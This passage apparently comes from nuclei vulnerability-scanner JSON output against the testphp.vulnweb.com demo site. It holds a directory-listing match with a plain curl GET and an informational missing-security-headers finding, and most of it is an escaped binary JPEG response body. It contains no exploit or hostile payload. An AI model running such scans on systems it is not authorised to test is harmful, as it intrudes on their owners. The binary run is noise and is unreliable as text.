href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"scripts/\\\"\\u003escripts/\\u003c/a\\u003e 08-Apr-2013 08:44 -\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:36.11632807Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59' 'http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/6.jpg.tn\",\"path\":\"/pictures/6.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/6.jpg.tn\",\"request\":\"GET /pictures/6.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4345\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:20 GMT\\r\\nEtag: \\\"4dca64a1-10f9\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001d\\u0000\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0003\\u0005\\u0006\\u0007\\u0008\\t\\u0002\\u0001\\ufffd\\ufffd\\u0000:\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0002\\u0005\\u0001\\u0006\\u0004\\u0004\\u0007\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!\\u00061\\u0007\\u0013\\\"AQa\\u00142q\\ufffd\\ufffd\\ufffd\\u0015#B\\ufffd\\u0008R\\ufffd\\ufffd\\u0016$br\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0006\\u0005\\u0007\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0001\\u0006\\u0005\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004!1\\u0005\\u0012A\\\"\\u0006\\u0013\\u0014aq\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdBQ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffdJR\\ufffd\\u0000\\ufffd~\\ufffd\\ufffd\\ufffd'\\ufffd\\rz5\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffdPU\\ufffdpT\\u0012\\t\\ufffd$\\ufffda߷֛)\\ufffd\\u001f\\ufffd\\ufffdT\\ufffd\\ufffdĩUn \\ufffd\\ufffdy!\\ufffd7\\ufffdXث\\ufffd\\ufffd\\n\\ufffdpA\\u0007\\ufffd~C\\u001b\\ufffd*\\ufffd\\u0012\\ufffd\\ufffd\\ufffd*\\ufffd\\ufffd\\ufffdO`)\\ufffd\\u0014\\ufffd[n?\\u000bm\\ufffd\\ufffd\\ufffd_\\ufffd\\ufffdFv\\ufffd\\ufffd\\ufffd@Hls\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffd:\\ufffdu\\u000f\\ufffd\\ufffdݣ\\ufffde.\\ufffd\\ufffd\\\"\\ufffdG\\ufffd#\\u003c7\\ufffd\\ufffd#\\u0004\\ufffd0Mh\\ufffd)\\ufffdq.\\t\\u001dR^\\t\\ufffd\\u0015\\ufffd\\u0017\\ufffd]iڽ\\ufffd\\ufffd-\\ufffd\\u0013,',\\ufffd\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u003c\\ufffd;\\ufffd\\ufffdgu\\u001e\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffdP\\t\\ufffde\\ufffd7*\\ufffd\\ufffd'\\ufffd\\u0000\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\u000cVR\\ufffdLH\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c\\u001c\\ufffdˑ\\ufffd\\u0007\\u0015\\ufffdi]=\\u0012\\ufffd+.X\\u00101\\ufffd\\ufffd\\ufffd9\\u0003۵f\\ufffd\\ufffdI\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\ufffd\\ufffdMa\\u001cg\\ufffd\\ufffdM\\ufffd^\\ufffdkp1$M\\ufffd\\ufffd\\u0010\\u000f\\ufffd\\u0019\\u0000\\ufffd\\ufffd\\u0011\\ufffd\\\"\\ufffdWV\\ufffd/OEu%\\ufffd\\u0017\\u0010\\ufffd,\\ufffdݸ\\u003ep0\\ufffdl\\ufffd\\ufffd\\u0003 \\ufffd\\\\v\\ufffd\\ufffd=K\\ufffdE\\ufffdot\\ufffd\\ufffd\\ufffd[iZ3\\ufffd\\n\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\u001f\\ufffd\\ufffdE\\ufffd\\ufffd\\ufffd;rS\\ufffd\\ufffd[-ԥ*\\ufffd\\u0008\\ufffd)@\\nR\\ufffd\\u0000\\ufffd)@\\nR\\ufffdDŽ\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\ufffd\\u0012\\ufffd\\ufffd६\\ufffdC ~1\\ufffd\\u001c烐p1ۜT:\\ufffdEzx;,xHt \\ufffd\\ufffd\\ufffd/\\ufffd\\ufffd[T\\ufffd\\ufffdOan\\ufffd\\ufffd\\u0014\\ufffd6]FH \\ufffd\\ufffd~\\u000e\\ufffd\\ufffd\\ufffd\\ufffdJi\\ufffd\\ufffd\\u0014\\ufffd\\ufffdj;\\ufffd\\ufffd\\ufffdOW\\ufffd\\u001f\\ufffd\\u001f53\\ufffd\\ufffd4\\ufffd\\ufffdn$\\ufffd\\ufffd9\\u0012eo0\\ufffd`\\ufffdb\\ufffd9\\u0001\\ufffd#,\\ufffd\\ufffd\\u0004\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd\\ufffd.\\u0012g\\ufffd[{\\ufffd\\\\1\\u000c\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdazj\\ufffd\\ufffd\\ufffd\\ufffd-\\u003e\\ufffd\\ufffd\\ufffdMa\\ufffd\\ufffd\\u0011\\ufffdꚽ\\ufffd\\ufffd\\u0018f\\ufffdG\\ufffdq\\u0012\\u0026\\ufffd\\u00263\\ufffd\\ufffdQ\\ufffd0T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdE\\ufffd[^\\ufffdIs\\ufffdtp\\ufffd[1\\u000c{\\ufffd\\r\\ufffd\\ufffd~\\u0004\\ufffd\\u0000z\\ufffd5\\ufffdG\\u0012eG\\ufffd:\\ufffd@8'\\ufffd\\u001e@\\ufffd \\u0001\\ufffd\\ufffd\\u0000H\\ufffd\\\\6\\ufffd\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffd \\ufffd\\u001c\\ufffdƌz\\ufffd\\ufffd;\\ufffd\\ufffd1\\ufffdy\\ufffd\\ufffd\\u0013\\\\\\ufffd=\\ufffd\\ufffd\\ufffd\\n*\\\\~ÝUJO(\\ufffdZD!\\u0002$\\ufffd\\ufffde\\ufffd\\u000eCn\\u001fF\\u001c\\u001fʯ\\ufffdt\\ufffdw\\ufffdK\\u001cc\\u0002u-\\u001b\\ufffd68\\ufffd\\u0019?\\\\sߜ\\ufffdqY\\ufffd\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffd뱉b\\n\\ufffd\\ufffd\\ufffd\\u003e~\\ufffdZ\\ufffd\\ufffd8S\\ufffdQ\\ufffd\\ufffd\\ufffds\\ufffdU;z\\ufffd\\ufffd\\ufffd\\ufffd̙(\\ufffd\\ufffd[\\ufffdX]DV\\u001b\\ufffdW}\\ufffd\\u0002\\\\\\u0000\\t\\u001c\\u001e\\ufffd\\ufffd\\ufffd\\u0008\\ufffdY\\ufffd\\ufffdh\\ufffdF\\ufffd\\ufffd\\n4\\ufffd\\ufffda\\ufffd\\ufffd8\\ufffdl\\ufffd\\u001e;\\ufffd\\u0013\\ufffd*\\ufffd5\\ufffd\\ufffd^-\\ufffd\\ufffd3\\ufffd\\u0001 pO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdk\\u0003\\u0018\\ufffdn#B\\u0019J\\ufffd\\u003c\\ufffd\\u001e\\ufffd\\ufffd]F\\ufffd\\ufffd/\\ufffd'zQ\\ufffd\\ufffdd\\ufffd0\\\\}\\ufffdy\\u001b|ou4H\\u0013\\ufffd\\ufffdY\\ufffdg#\\ufffd\\ufffd3\\\\\\ufffd\\ufffd$\\ufffd\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdA\\\"G\\ufffdZ\\ufffd\\ufffd1\\ufffdy\\ufffd\\u00267\\ufffd\\ufffd\\ufffd3\\ufffd\\u0000\\ufffd}\\ufffd\\ufffd.\\ufffd\\ufffd\\ufffdNH\\ufffd\\ufffd0\\ufffd\\r\\ufffdg\\t\\ufffdL\\u0012\\u0000\\ufffd\\ufffd\\ufffdX\\u000f\\ufffd\\u001e\\u001f\\ufffd\\ufffd\\ufffdؠ\\ufffd\\ufffd\\u001e\\ufffd\\u000c\\ufffdu\\ufffd\\ufffdp\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\u0014\\ufffd\\\\\\ufffd\\ufffd\\u0007\\u0007\\u0018=N\\ufffd\\ufffd#\\ufffd\\ufffdE\\ufffd\\ufffd/)\\ufffd\\ufffd\\ufffd7\\ufffd{\\u000c.N \\ufffdJԬ\\ufffd\\ufffdo\\ufffd,\\ufffd#1\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*-zj\\ufffdtr\\ufffd*\\ufffdA\\\"\\ufffd\\ufffd\\ufffda\\u0013\\ufffd\\\"\\ufffd\\u000e\\u000b\\u0000\\t\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd@\\nR\\ufffd\\u0000\\ufffd)@\\nݽ\\u0019\\ufffd\\u000e\\ufffd\\ufffdtJi7\\ufffd;\\u000f\\ufffd\\u0008\\u001d\\u0004W6Q\\ufffd^bn\\u001b\\ufffd\\ufffdr\\ufffd\\u0000\\u0001݇\\u000cG\\ufffdq\\ufffd\\ufffd*U}N\\ufffd\\ufffdTT-YI\\ufffdt\\u0026\\ufffd\\ufffd\\u0013\\ufffdn\\ufffd\\ufffd\\ufffd7\\ufffdtKy\\ufffdn-\\ufffd%x\\u0004\\ufffd\\u0008Ϩ\\u000c.C\\u0002\\u0000ʳ\\u0005$pH8\\ufffd\\u0008[\\ufffd\\ufffd\\\"]\\ufffd-\\ufffd\\ufffd\\ufffd,\\ufffdr-\\\\\\u0004i\\ufffd\\ufffd#.Oel\\u0010\\u001b\\ufffd;O#\\u0019\\ufffdO\\n\\ufffd@\\ufffd\\ufffd}n9\\ufffd.\\ufffd\\u000f i\\ufffd\\u0007\\ufffd\\ufffdo\\ufffd\\u0003\\ufffd\\nϺ\\ufffd\\ufffd[\\ufffdg\\ufffd4\\ufffdm\\u003c\\ufffd:\\ufffd\\ufffdY\\ufffd\\ufffd+mf\\ufffd\\ufffd\\ufffdn\\ufffd\\u0015\\ufffdM\\ufffd\\ufffdFw\\ufffd\\ufffd\\u0007z\\ufffd_\\ufffdŰԿq\\ufffd1\\ufffd\\ufffd\\u001f,y-\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffd}2\\ufffd\\u0005 x\\ufffdQ\\u003cBkq'\\u000f\\ufffd\\u0003r\\ufffd\\ufffd\\ufffdI\\u0003\\u001f\\u0004|\\u001a\\ufffd%\\ufffdb΀\\ufffd\\u0007'\\ufffd\\ufffd.\\ufffd\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdݕ\\ufffd\\ufffd\\ufffd\\ufffd\\u0015i!\\ufffd+\\ufffd1\\ufffd\\u0001\\u000e\\ufffd%\\ufffd\\u0018\\ufffd\\ufffd\\ufffd\\ufffdF+=\\ufffdb\\ufffd\\ufffd1ナ\\ufffdYMt݋\\ufffd\\ufffdș\\ufffd\\u0019Dt\\ufffd\\ufffd\\u0014\\\\\\ufffd\\u000e_fcRC}x\\ufffd\\u000fDZ\\ufffd\\u003e\\ufffd\\rݵմ\\ufffdkr\\ufffd\\u0016\\ufffd\\ufffd\\u0000ψ\\ufffd\\ufffd^0Ɂ\\ufffd\\\\\\u0013\\ufffd\\u00169\\u003c\\ufffd\\u0001W8\\ufffdY\\ufffdz\\u0015\\u003c\\ufffd;Np\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\u0003\\ufffd\\u0004\\u000eǸ\\ufffd\\ufffdДc?W\\u0001\\ufffd\\ufffd\\\"\\ufffd\\\\%\\ufffd@\\ufffd\\ufffd'\\u0001\\ufffd\\ufffdʺ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=\\ufffd\\u0000\\u001a\\ufffdP\\ufffd\\ufffd7\\ufffd\\ufffd\\u001f\\ufffd \\ufffdK;\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\u0006\\t\\\\z\\ufffd\\u0017\\ufffd\\u0005\\ufffd\\ufffd0\\ufffd\\ufffdrx\\u0018\\u0019\\ufffdn)\\ufffdM\\ufffd\\ufffd_\\ufffdG\\\"5\\ufffdI%\\ufffd\\ufffd\\t\\u0002V\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdqT\\ufffd\\ufffd/,\\u000e\\ufffd\\u0019]C\\ufffd\\u0003\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u0003R\\ufffd\\ufffd\\ufffda\\u0001\\u0016\\ufffd\\u0014h\\ufffdE\\ufffd\\ufffd1\\u0004\\ufffdp\\u000f\\u001f8\\ufffd\\ufffdQU\\\\\\ufffd\\ufffd\\u0016^E\\ufffd74w\\ufffd\\ufffd\\u0010\\ufffdp\\ufffdsG\\ufffdb\\ufffd\\u0015\\u0001fE?˺\\u0000\\u0000\\ufffd\\ufffd\\ufffdl\\u0000\\u0003\\u001e;\\u0006\\ufffd\\ufffd.\\u0003ᯄ6\\ufffd\\u00163[u\\ufffd\\ufffdMQ\\ufffd%b\\ufffd\\ufffdhT*\\ufffd0R;\\ufffd'\\ufffd\\ufffd\\\\`溺\\ufffd\\u0000$\\ufffd\\ufffd\\u003c\\ufffd(0\\ufffd\\u0018\\ufffd\\u0000|`\\ufffd\\ufffdU\\ufffdP\\ufffd\\ufffd]ķ\\ufffd!\\ufffdB\\ufffd\\u003e0T\\ufffda\\t\\ufffd\\ufffd\\u0019\\u001e\\ufffd\\u0000\\u0011\\ufffdgAG]\\ufffdQ\\ufffd\\ufffdf\\ufffd\\ufffd\\ufffd\\u0000RǏ\\ufffd\\ufffd\\\"\\ufffd\\u001c\\ufffd\\ufffd5~\\ufffd\\ufffdt\\ufffd\\ufffdM\\ufffd6\\ufffd\\ufffd$p\\ufffd\\ufffdI\\ufffd\\ufffd+\\ufffdm\\ufffd\\u000c\\u0002{\\ufffdx\\ufffd\\ufffd9\\u000bZ\\ufffd.\\ufffdmR\\ufffdO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\u003c\\u0010\\u000e\\u0008\\ufffd}\\rz;\\u000cP\\ufffd\\u001cN\\ufffddP7F㜃\\ufffd\\ufffdpG\\ufffd\\ufffd\\\\\\ufffd\\ufffd'|5\\ufffdL\\u000f\\ufffdZ4\\u0011\\ufffd\\ufffd)k\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd#.J\\ufffdz\\u0007$\\ufffd=9\\ufffd8\\u0002\\ufffd~\\ufffdu\\ufffd\\ufffdt^\\ufffd\\ufffd\\u001f_\\ufffd3Q\\u00055\\ufffd\\ufffd\\ufffd\\\\\\ufffd)[€\\ufffd)@\\nR\\ufffd\\u0000\\ufffd)@\\u001d5\\ufffd7\\ufffdK'H\\ufffd\\u001a\\ufffd\\ufffd\\ufffd}.O9\\u001eFr\\u0004\\u001d\\ufffd*\\ufffd\\u000b(\\ufffd\\r\\ufffd\\ufffdv\\u001c1\\u003co\\ufffd\\ufffdEK[\\ufffd\\ufffd\\ufffd\\ufffd1R$i\\u000b\\u0015\\ufffdc@\\ufffd\\ufffd\\ufffd\\ufffd\\r\\ufffd\\ufffd\\ufffd\\u001c\\ufffd\\n\\ufffd\\ufffd@\\ufffdnt]R\\u001b\\ufffd6ı\\ufffd\\ufffḑ\\ufffdS\\ufffd\\ufffdEu\\ufffd\\ufffd\\ufffd\\ufffd%\\ufffd\\ufffdq̗\\ufffd\\ufffdл\\u001c\\u0003\\ufffd$\\ufffd\\u0019\\ufffd\\ufffd)\\ufffd\\ufffd\\u000c\\ufffd\\rb\\ufffd\\ufffd\\ufffd**WU\\ufffd\\ufffd\\ufffdOgz\\ufffdf\\ufffdԄ\\ufffd\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd-\\u003c *\\ufffd\\ufffd\\u0000d1\\ufffd\\ufffd\\u0014c\\u003c\\u001f\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffdIm$\\ufffd\\ufffd:\\u000f0\\u0014V_Ab\\u0007\\ufffd\\ufffd\\u0004\\u0015*W$\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd;M\\u0006\\ufffdSYLRYrʌ]\\ufffd\\ufffd\\u0014\\u000e\\u0007\\ufffd\\ufffd\\u00198\\ufffd\\t\\ufffdlU\\ufffdÿ\\u0013\\ufffd\\ufffd\\ufffdd\\ufffd\\u0013ej\\ufffd\\ufffd\\ufffde\\ufffd\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\u0000\\u0018e*\\ufffd6{z\\u0018}\\ufffd\\u000e\\u001d\\u001d3U\\n%j_-\\ufffd\\ufffd\\u0000G\\ufffd4\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdbIc\\ufffdf\\u0001ܣ%\\u001aA\\ufffd'\\ufffdRN\\u0014\\n\\ufffdb\\u003eߤ\\ufffd\\ufffd\\ufffd\\u003eZ2\\ufffdg\\u0008\\ufffd\\ufffdr\\ufffd\\ufffdr\\n\\ufffd#\\ufffd\\ufffd\\ufffd-N\\ufffd\\ufffd\\ufffd\\t\\ufffdl\\ufffd2\\ufffdBF\\u000f\\ufffd\\u0011\\ufffdE}i\\ufffd\\ufffd'\\ufffd\\ufffdܬ2yh\\ufffd\\ufffdlM\\ufffd\\ufffd\\ufffd\\ufffd@?\\ufffd\\u000f\\u001d\\ufffd\\ufffd)O\\ufffd\\u0012\\ufffd\\\"4\\ufffd\\ufffd\\u0017\\u000b4A\\ufffdӆ(\\ufffdN@e$0\\u0007\\u0003 \\u0010Goj4\\ufffd\\u0000b\\ufffd\\ufffdW\\u0002\\t1\\ufffdg\\u003cq\\ufffd\\ufffd?\\u000b\\ufffd1\\ufffd\\ufffd\\ufffdN\\u0013\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffd8\\u000e\\ufffd\\ufffd1\\u001a\\ufffd\\u0007\\ufffdrs\\ufffd\\ufffd\\u0000J\\ufffd4{\\ufffd{eNy\\ufffd\\ufffd\\u0000l\\ufffd\\ufffd\\ufffdN\\ufffd'\\r\\ufffd\\ufffdڟ%\\ufffd\\ufffd9?\\ufffd\\\\H\\ufffd\\ufffd樑d\\u000e\\ufffdy\\ufffdvc\\u0018\\ufffdl\\u001eC\\u000c\\ufffd\\ufffdc?\\ufffd\\ufffdu\\u0017\\ufffd:\\ufffd\\u0018\\u0015 \\ufffd\\ufffd\\ufffd9\\u0007\\ufffd\\ufffd\\ufffd\\ufffdE\\ufffd\\ufffdh\\ufffdf\\ufffd\\ufffdN\\ufffd? g\\ufffd##\\u003e٩v\\ufffd)q\\n\\ufffd\\u0013\\u0006\\u000c\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd9+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffdأ%\\ufffd\\ufffd}\\ufffd\\u0018\\u0000x݁uw\\u003cr2\\ufffdy\\ufffd\\u0019\\ufffd܏bI0z\\ufffdN\\ufffdR\\ufffd\\ufffd\\ufffdh\\ufffd{gc\\ufffdG*\\ufffd\\ufffd\\ufffdF\\u0018!\\ufffd\\u000er;\\u000c\\ufffd\\ufffdo\\ufffd!\\ufffdX\\ufffd\\ufffd\\ufffdv\\ufffd\\u0000\\ufffd\\u0003\\u0003;\\ufffd d\\ufffd\\u0000H'\\u0007\\ufffd\\ufffdy\\u0014Yb\\ufffd\\ufffd\\ufffd\\ufffd/\\u001f\\ufffd\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\ufffd\\ufffdBj:O^\\ufffd\\ufffd\\ufffd\\ufffdks~\\ufffd\\ufffde\\ufffd\\ufffd\\u000b\\ufffd\\ufffd\\u000c7#\\ufffd\\u0001\\ufffdOr\\u0006\\u0001\\u000c=\\ufffd\\ufffdֽ\\u0019\\ufffd\\ufffdeݬ\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdȌ\\u001d\\u001cP\\u000c?\\ufffdO\\u0004w\\u0007\\ufffdA=ܶV\\ufffdk\\ufffd$\\ufffd \\ufffd\\ufffd\\ufffdCi+\\u0016$$\\ufffd\\u0017\\ufffd9\\u003e\\ufffd\\u0019\\u001c\\u000c2ջ\\ufffd.\\ufffd\\ufffd\\ufffdΓ\\ufffdѵ+cotS̷\\ufffd\\u001b\\\\E0\\ufffd\\n\\ufffd3\\ufffd0r\\u0001*\\ufffd\\ufffd\\ufffd6\\ufffdj\\ufffd\\ufffd\\\\m\\ufffd\\ufffd\\u001e\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^zd\\ufffd\\ufffd\\ufffd\\ufffdVs\\ufffdx[\\ufffd\\ufffde\\ufffd\\ufffduu\\ufffdI\\ufffdm8o\\ufffdt\\ufffd\\u0018\\ufffd\\ufffd\\ufffd\\t\\ufffd̀\\u001eX\\u000c.\\u0018\\u001c\\u0015l`ղ\\ufffd\\ufffd\\ufffdY\\ufffdI\\ufffd\\n\\ufffd.\\u003c\\ufffdR\\ufffd \\ufffd\\ufffd\\ufffd\\u0000+$鞮\\ufffdzz\\ufffdh\\ufffdXs\\ufffdE\\ufffd\\ufffdS\\u00122G\\u003e\\ufffdc\\ufffd\\ufffdt\\ufffd\\ufffd\\u0011\\ufffdĖP\\ufffd\\ufffd\\ufffd\\u0026˩\\ufffdM\\u0014\\ufffd\\ufffdw\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd,\\t\\ufffd\\u003e\\ufffd\\u0000P)\\ufffdj7:N\\ufffd\\r唅'\\ufffd\\ufffd\\u0003\\ufffd~\\ufffd\\ufffdj\\u0015)ZMa\\ufffd\\ufffd:\\ufffd\\ufffdz\\ufffd\\u0014\\ufffdi.\\r\\ufffd0\\ufffd\\ufffdb\\ufffd6\\ufffd.~\\ufffd\\u0012I\\ufffd\\ufffdϾs\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffdV\\r\\ufffd\\ufffd\\ufffd˒\\ufffd\\u0016%s\\ufffd\\u003c\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffd\\\\\\ufffdG\\ufffd7NH\\ufffd\\ufffdw\\ufffd\\ufffd\\ufffd\\u003cՌ\\u003eF@,\\ufffdw\\u0003\\ufffds\\ufffd9\\\"\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=jd\\u0026W\\ufffd\\ufffdԏ1\\ufffdm\\ufffd\\ufffdڟ@\\ufffd\\ufffdܱ\\ufffd\\ufffd\\u0005\\ufffd4\\ufffd\\ufffdl\\ufffdQ\\ufffdK)\\ufffd|c\\ufffd:TNV\\ufffd\\u0026f)\\u0000:\\ufffd\\ufffd\\u000c9\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000f|\\ufffd\\ufffdH\\ufffd\\ufffdKx\\ufffd9\\ufffdYa\\ufffd\\u000c\\ufffdT\\ufffd\\ufffd.J\\ufffd\\ufffd]\\ufffd%\\ufffdw\\ufffd|\\ufffd\\u00260\\ufffdw\\u0003\\ufffd\\u000foҲ\\ufffd\\u000eܢ\\ufffdc\\ufffda\\ufffd\\\\SP\\ufffd\\ufffd\\u0011$2\\ufffd\\ufffd7\\u001b\\ufffd\\ufffd|~+\\u001b\\ufffd\\ufffd[[\\ufffd\\ufffd\\ufffd\\ufffd0$\\ufffdô\\u0010s\\ufffd~y\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-/\\ufffd\\ufffd_4D\\ufffdޑ\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd@\\u001f#\\ufffd\\ufffdS5m@\\\\\\ufffd\\u001e\\ufffd0ϸ\\ufffd2\\ufffd\\ufffd($\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffdN\\u001a\\u0019S-\\ufffdc\\ufffd\\ufffd62\\ufffd5\\ufffdV\\ufffdt\\ufffd\\ufffd\\ufffdVR\\ufffd\\u0019\\ufffd~\\ufffdF\\u0008 \\ufffd`\\ufffdԻ=v\\ufffd\\ufffd\\ufffdV2\\u003c\\ufffd\\u0002\\ufffdbA\\ufffd\\ufffd\\u00001' \\ufffd\\u00003ܑ\\ufffdyƓ\\ufffd\\ufffdR\\ufffdU\\ufffd\\u001d\\ufffd\\ufffd\\u0018\\ufffdE\\ufffd\\ufffd9ܟ\\ufffd\\u0003۱\\ufffd\\ufffd\\ufffd\\ufffdT=T\\ufffdƭ\\ufffd\\ufffdRyU7\\ufffd*\\ufffd\\ufffd\\tu\\u0005\\ufffdG\\u0003qQ\\ufffd\\ufffd\\ufffdƬˢO\\ufffde\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\ufffdQ\\ufffd:\\ufffd\\ufffd5\\ufffds\\ufffdF\\ufffdl\\ufffd\\u0008#\\ufffd\\u000fЃ\\ufffd\\ufffd\\ufffd\\ufffdZMom\\ufffd\\ufffds2\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffd`\\u001229\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd#\\ufffd\\ufffd{v\\ufffd\\u001c\\ufffd\\ufffdV\\ufffd\\u0018u#\\ufffd\\ufffd@\\ufffd\\ufffd\\\\\\ufffd\\ufffd_X\\ufffd\\ufffdRА;\\\\+\\ufffdY\\ufffd}\\u0003\